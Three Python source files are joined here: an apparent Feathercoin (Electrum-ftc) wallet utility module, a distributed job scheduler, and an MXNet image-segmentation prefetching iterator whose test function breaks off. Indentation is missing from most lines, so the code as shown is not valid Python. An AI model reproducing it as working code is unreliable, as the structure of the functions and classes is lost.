def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " BTC"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
xdg_default = os.path.join(os.environ["HOME"], ".local", "share")
return os.path.join(os.getenv("XDG_DATA_HOME", xdg_default), "electrum-ftc")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-ftc")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-ftc")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
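# e.g. with a '.' locale decimal point:
#     format_satoshis(150000000)              -> '1.5'
#     format_satoshis(150000000, num_zeros=2) -> '1.50'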
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'explorer.feathercoin.com': ('http://explorer.feathercoin.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'chainz.cryptoid.info': ('https://chainz.cryptoid.info/ftc/',
{'tx': 'tx.dws?', 'addr': 'address.dws?'}),
}
testnet_block_explorers = {
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'explorer.feathercoin.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a feathercoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'feathercoin':
raise Exception("Not a feathercoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid feathercoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
    if 'message' in out:
        out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
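# Illustrative call (the address placeholder is hypothetical):
#
#     parse_URI('feathercoin:<addr>?amount=1.5&message=donation')
#     # -> {'address': '<addr>', 'amount': 150000000,
#     #     'message': 'donation', 'memo': 'donation'}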
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='feathercoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
Path(path).mkdir(parents=True)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
scheduler.py
|
import Queue
import math
import traceback
from threading import Thread
import monotonic
from distributed import as_completed
from .util import TimeoutManager, haydi_logger
class Job(object):
def __init__(self, worker_id, start_index, size):
"""
:type worker_id: str
:type start_index: int
:type size: int
"""
self.worker_id = worker_id
self.start_index = start_index
self.size = size
self.result = None
self.start_time = monotonic.monotonic()
self.end_time = None
def finish(self, result):
self.result = result
self.end_time = monotonic.monotonic()
def get_duration(self):
return self.end_time - self.start_time
def __str__(self):
return "Job(worker={}, from={}, to={}".format(
self.worker_id,
self.start_index,
self.start_index + self.size)
class JobScheduler(object):
"""
Creates computational graphs for distributed and iterates through them.
Can be limited by domain size or timeout.
"""
def __init__(self,
executor,
worker_count,
strategy,
timeout,
tracer):
"""
:param executor: distributed executor
:param worker_count: number of workers in the cluster
:type strategy: haydi.base.runtime.strategy.WorkerStrategy
:type timeout: datetime.timedelta
:param timeout: timeout for the computation
:type tracer: haydi.base.runtime.trace.Tracer
"""
self.executor = executor
self.worker_count = worker_count
self.size = strategy.size
self.strategy = strategy
self.tracer = tracer
self.index_scheduled = 0
self.index_completed = 0
self.job_size = None
self.timeout_mgr = TimeoutManager(timeout) if timeout else None
self.ordered_futures = []
self.backlog_per_worker = 4
self.target_time = 60 * 3
self.target_time_active = self.target_time
self.completed_jobs = []
self.job_queue = Queue.Queue()
self.job_thread = None
self.completed = False
self.canceled = False
self.cached_args = None
def start(self):
self.cached_args = self.strategy.create_cached_args()
self.executor.scatter([self.cached_args], broadcast=True)
self.job_thread = Thread(target=self._iterate_jobs)
self.job_thread.daemon = True
self.job_thread.start()
def stop(self):
self.canceled = True
size = len(self.ordered_futures)
for i in xrange(size):
self.ordered_futures[i].cancel()
def _iterate_jobs(self):
"""
Iterate through all jobs until the domain size is depleted or
time runs out.
:return: completed job
"""
backlog_half = self.backlog_per_worker / 2
active_futures = self._init_futures(self.backlog_per_worker)
next_futures = []
try:
while ((self._has_more_work() or
self.index_completed < self.index_scheduled) and
not self.canceled):
iterated = 0
for future in as_completed(active_futures):
job = future.result()
self._mark_job_completed(job)
iterated += 1
self.tracer.trace_job(job)
if iterated >= (backlog_half * self.worker_count):
iterated = 0
if self._has_more_work():
next_futures += self._schedule(backlog_half)
if self._has_more_work():
next_futures += self._schedule(backlog_half)
active_futures = next_futures
next_futures = []
except Exception as e:
haydi_logger.error(traceback.format_exc(e))
self.completed = True
def _schedule(self, count_per_worker):
"""
Adjust batch size according to the average duration of recent jobs
and create new futures.
:param count_per_worker: how many jobs should be spawned per worker
:rtype: list of distributed.client.Future
:return: newly scheduled futures
"""
duration = self._get_avg_duration()
delta = duration / float(self.target_time_active)
delta = self._clamp(delta, 0.5, 1.25)
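        # e.g. jobs averaging 90 s against the 180 s target give delta = 0.5,
        # which doubles the batch size on the next scheduling round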
previous_size = self.job_size
self.job_size = int(self.job_size / delta)
self.tracer.trace_job_size(self.job_size)
haydi_logger.info("Scheduling: avg duration {}, size {} -> {}"
.format(duration, previous_size, self.job_size))
return self._create_futures(self._create_distribution(
self.worker_count * count_per_worker, self.job_size))
def _clamp(self, value, minimum, maximum):
return min(maximum, max(minimum, value))
def _get_avg_duration(self):
job_histogram = self.completed_jobs[-self.worker_count:]
total_duration = sum([j.get_duration() for j in job_histogram])
return total_duration / float(len(job_histogram))
def _init_futures(self, count_per_worker):
job_count = self.worker_count * count_per_worker
self.job_size = 200
if self.size:
total_size = int(math.ceil(self.size / float(job_count)))
if total_size < self.job_size:
self.job_size = total_size
return self._create_futures(self._create_distribution(
self.worker_count * count_per_worker, self.job_size))
def _create_distribution(self, job_count, job_size):
return [job_size] * job_count
def _truncate(self, job_distribution):
"""
:type job_distribution: list of int
:return:
"""
if self.size:
remaining = self._get_remaining_work()
expected = sum(job_distribution)
if expected > remaining:
per_job = remaining / len(job_distribution)
job_distribution = self._create_distribution(
len(job_distribution), per_job)
leftover = remaining - (per_job * len(job_distribution))
job_distribution[0] += leftover
assert sum(job_distribution) == remaining
return job_distribution
def _create_futures(self, job_distribution):
"""
:type job_distribution: list of int
:return:
"""
job_distribution = self._truncate(job_distribution)
batches = []
for job_size in job_distribution:
if job_size > 0:
start = self.index_scheduled
batches.append(self.strategy.get_args_for_batch(
self.cached_args, start, job_size))
self.index_scheduled = start + job_size
if len(batches) > 0:
self.tracer.trace_index_scheduled(self.index_scheduled)
self.tracer.trace_comment("Sending {} jobs with size {}"
.format(len(batches), self.job_size))
args = self.strategy.create_job(batches)
futures = self.executor.map(args[0], args[1])
self.ordered_futures += futures
return futures
else:
return []
def _mark_job_completed(self, job):
self.completed_jobs.append(job)
self.index_completed += job.size
self.tracer.trace_index_completed(self.index_completed)
self.job_queue.put(job)
def _get_remaining_work(self):
if self.size:
return self.size - self.index_scheduled
else:
return -1
def _has_more_work(self):
return (not self.size or self.index_scheduled < self.size)\
and not self.strategy.exhausted
|
my_prefetchingIter.py
|
# -*- coding: utf-8 -*-
# This version uses an input size of 50x50
mxnet_095 = '/home/forrest/MXNet/mxnet-0.9.5/python'
import sys
sys.path.append(mxnet_095)
import mxnet
import cPickle
import numpy
import random
import threading
import cv2
import time
import logging
import data_augmentation_util
class MyDataBatch():
    def __init__(self):
        self._data = []
        self._label = []
    def append_data(self, new_data):
        self._data.append(new_data)
    def append_label(self, new_label):
        self._label.append(new_label)
    def as_ndarray(self, ctx):
        for i in range(len(self._data)):
            self._data[i] = mxnet.ndarray.array(self._data[i], ctx=ctx)
        for i in range(len(self._label)):
            self._label[i] = mxnet.ndarray.array(self._label[i], ctx=ctx)
    @property
    def data(self):
        # backing fields are renamed to _data/_label: a property cannot share
        # its name with the instance attribute it returns
        return self._data
    @property
    def label(self):
        return self._label
def test_MyDataBatch():
temp_databatch = MyDataBatch()
temp_databatch.append_data(123)
temp_databatch.append_label(123)
print temp_databatch.data, temp_databatch.label
class ImageSegPrefetchingIter(mxnet.io.DataIter):
def __init__(self, dataPicklePath, \
nThread, \
batch_size, \
enable_horizon_flip=False, \
neg_ratio_list=None # [(iter, ratio),()]
):
# read data from pickle files --------------
try:
            logging.info('Start to load data pickle files, this may take several minutes ----------.\n')
            self.compressedData = cPickle.load(open(dataPicklePath, 'rb'))
            logging.info('Pickle files are loaded.\n')
        except:
            logging.error('Error occurred when loading pickle files!!!')
quit()
self.num_sample = len(self.compressedData)
logging.info('There are %d samples.\n', self.num_sample)
self.nThread = nThread
self.batch_size = batch_size
self.enable_horizon_flip = enable_horizon_flip
self.B_mean = 104.008
self.G_mean = 116.669
self.R_mean = 122.675
self.input_height = 100
self.input_width = 100
        self.neg_ratio = 1
        # default the ratio schedule to an empty list so reverse() and the
        # per-iteration lookup never hit None
        neg_ratio_list = neg_ratio_list or []
        neg_ratio_list.reverse()
        self.neg_ratio_list = neg_ratio_list
# prepare threads
self.data_taken = [threading.Event() for i in range(self.nThread)]
for e in self.data_taken:
e.set()
self.data_ready = [threading.Event() for i in range(self.nThread)]
for e in self.data_ready:
e.clear()
self.data_queue = [None for i in range(self.nThread)]
self.current_batch = None
self.started = True
# the main procedure running in a thread
def prefetch_func(self, i):
while True:
                timeoutFlag = self.data_taken[i].wait()  # a wait timeout here would let the thread detect shutdown or redundancy
if not self.started or not timeoutFlag:
break
try:
self.data_queue[i] = self._prepare_batch(i)
except Exception, e:
logging.error('Prepare batch wrong in thread %d !! -------------> \n %s', i, e.message)
self.data_queue[i] = None
continue
self.data_taken[i].clear()
self.data_ready[i].set()
self.prefetch_threads = [threading.Thread(target=prefetch_func, args=[self, i]) for i in range(self.nThread)]
for thread in self.prefetch_threads:
            thread.setDaemon(True)  # daemon threads exit automatically with the main process
thread.start()
def iter_next(self, num_iter):
#set neg ratio
for item in self.neg_ratio_list:
if num_iter >= item[0]:
self.neg_ratio = item[1]
break
# keep looping until getting the databatch
while True:
for i, dataBatch in enumerate(self.data_queue):
if not self.started:
quit()
if dataBatch is None:
continue
self.data_ready[i].wait()
self.current_batch = dataBatch
self.data_queue[i] = None
self.data_ready[i].clear()
self.data_taken[i].set()
return True
            time.sleep(0.001)  # brief sleep to avoid busy-waiting on the queue
def __del__(self):
# relase all threads
self.started = False
for e in self.data_taken:
e.set()
for thread in self.prefetch_threads:
thread.join(1)
# this fun is to prepare data batch including data augmentation, and return a DataBatch
def _prepare_batch(self, i):
im_batch = numpy.zeros((self.batch_size, 3, self.input_height, self.input_width), dtype=numpy.float32)
gt_batch = numpy.zeros((self.batch_size, 1, self.input_height, self.input_width), dtype=numpy.float32)
data_batch = MyDataBatch()
for loop in xrange(self.batch_size):
rand_idx = random.randint(0, self.num_sample-1)
# get image and gt
img = cv2.imdecode(self.compressedData[rand_idx]['image'].copy(), cv2.CV_LOAD_IMAGE_COLOR)
gt = cv2.imdecode(self.compressedData[rand_idx]['gt'].copy(), cv2.CV_LOAD_IMAGE_GRAYSCALE)
border = self.compressedData[rand_idx]['border'].copy() # numpy.array([top, bottom, left, right])
img_height, img_width = img.shape[:2]
gt_center_y = round((border[0]+border[1])/2.0)
gt_center_x = round((border[2]+border[3])/2.0)
change_ratio = 0.3
height_change = int( (round(self.input_height/2.0)-round((border[1]-border[0])/2.0))*change_ratio )
width_change = int( (round(self.input_width/2.0)-round((border[3]-border[2])/2.0))*change_ratio )
crop_top_change = random.randint(-height_change, height_change)
crop_left_change = random.randint(-width_change, width_change)
crop_top = gt_center_y-round(self.input_height/2.0)+crop_top_change
crop_left = gt_center_x-round(self.input_width/2.0)+crop_left_change
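            # (from_*) index the source image, (to_*) index the destination canvas;
            # where the jittered crop window sticks out of the image, the overhang is
            # left as zero padding in img_crop/gt_crop below.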
if crop_top < 0:
to_top = -crop_top
from_top = 0
else:
to_top = 0
from_top = crop_top
if crop_top+self.input_height > img_height:
to_bottom = img_height-crop_top
from_bottom = img_height
else:
to_bottom = self.input_height
from_bottom = crop_top+self.input_height
if crop_left < 0:
to_left = -crop_left
from_left = 0
else:
to_left = 0
from_left = crop_left
if crop_left+self.input_width > img_width:
to_right = img_width-crop_left
from_right = img_width
else:
to_right = self.input_width
from_right = crop_left+self.input_width
img_crop = numpy.zeros((self.input_height, self.input_width, 3), dtype=numpy.uint8)
gt_crop = numpy.zeros((self.input_height, self.input_width), dtype=numpy.uint8)
img_crop[int(to_top):int(to_bottom), int(to_left):int(to_right), :] = img[int(from_top):int(from_bottom), int(from_left):int(from_right), :]
gt_crop[int(to_top):int(to_bottom), int(to_left):int(to_right)] = gt[int(from_top):int(from_bottom), int(from_left):int(from_right)]
if self.enable_horizon_flip and random.random() < 0.5:
img_crop = data_augmentation_util.horizon_flip(img_crop)
gt_crop = data_augmentation_util.horizon_flip(gt_crop)
# cv2.imshow('im', img_crop)
# cv2.imshow('gt', gt_crop)
# cv2.waitKey()
img_crop = img_crop.astype(dtype=numpy.float32)
gt_crop = gt_crop.astype(dtype=numpy.float32)
img_crop[:, :, 0] = img_crop[:, :, 0] - self.B_mean
img_crop[:, :, 1] = img_crop[:, :, 1] - self.G_mean
img_crop[:, :, 2] = img_crop[:, :, 2] - self.R_mean
gt_crop = gt_crop/255.0
im_batch[loop, :, :, :] = img_crop.transpose([2, 0, 1])
gt_batch[loop, 0, :, :] = gt_crop
# doing sample balance
pos_flag = gt_batch>0.5
num_pos = numpy.sum(pos_flag)
num_neg = gt_batch.size-num_pos
select_num_neg = min([num_pos*self.neg_ratio, num_neg])
prob_threshold = float(select_num_neg)/num_neg
prob_mat = numpy.random.random(gt_batch.shape)
prob_mat[pos_flag] = 1
mask_batch = numpy.zeros(gt_batch.shape, dtype=numpy.bool)
mask_batch[prob_mat<prob_threshold] = 1
mask_batch[pos_flag] = 1
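        # Sample balancing in numbers: all positive pixels are kept, and each negative
        # pixel survives with probability select_num_neg/num_neg, so the expected
        # negative:positive ratio in mask_batch is at most self.neg_ratio.
        # E.g. with num_pos=1000, neg_ratio=2, num_neg=100000: prob_threshold=0.02.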
data_batch.append_data(im_batch)
data_batch.append_label(mask_batch)
data_batch.append_label(gt_batch)
return data_batch
def reset(self):
pass
def getBatchsize(self):
return self.batch_size
    def next(self, num_iter):
        if self.iter_next(num_iter):
            return self.current_batch
    def getdata(self):
        return self.current_batch.data
    def getlabel(self):
        return self.current_batch.label
    def getindex(self):
        return self.current_batch.index
    def getpad(self):
        return self.current_batch.pad
def testPeopleSegPrefetchingIter():
logging.getLogger().setLevel(logging.DEBUG)
neg_ratio_list=[(10,2), (100,10), (200,20)]
myIter = ImageSegPrefetchingIter(dataPicklePath='./data/train_data_2017.6.22.pkl', \
nThread=5, \
batch_size=32, \
enable_horizon_flip=True,\
